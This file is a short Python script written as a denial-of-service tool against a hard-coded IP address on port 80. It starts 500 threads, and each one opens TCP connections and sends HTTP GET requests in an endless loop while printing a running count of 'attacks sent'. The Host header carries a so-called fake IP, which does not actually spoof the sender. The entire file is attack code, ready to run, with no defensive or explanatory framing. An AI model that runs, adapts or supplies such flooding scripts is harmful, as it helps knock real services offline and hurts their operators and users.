import socket
import threading

# target details
target = '74.50.85.170'
port = 80  
Trd = 500  
fake_ip = '44.197.175.168'

attack_num = 0  # Initialize attack counter

def attack():
    global attack_num
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((target, port))
            s.sendto(("GET / HTTP/1.1\r\n").encode('ascii'), (target, port))
            s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
            s.close()
            attack_num += 1
            print(f"Attacks sent: {attack_num}")
        except Exception as e:
            print(f"Error: {e}")
            s.close()

# Create and start threads
for i in range(Trd):
    thread = threading.Thread(target=attack)
    thread.start()
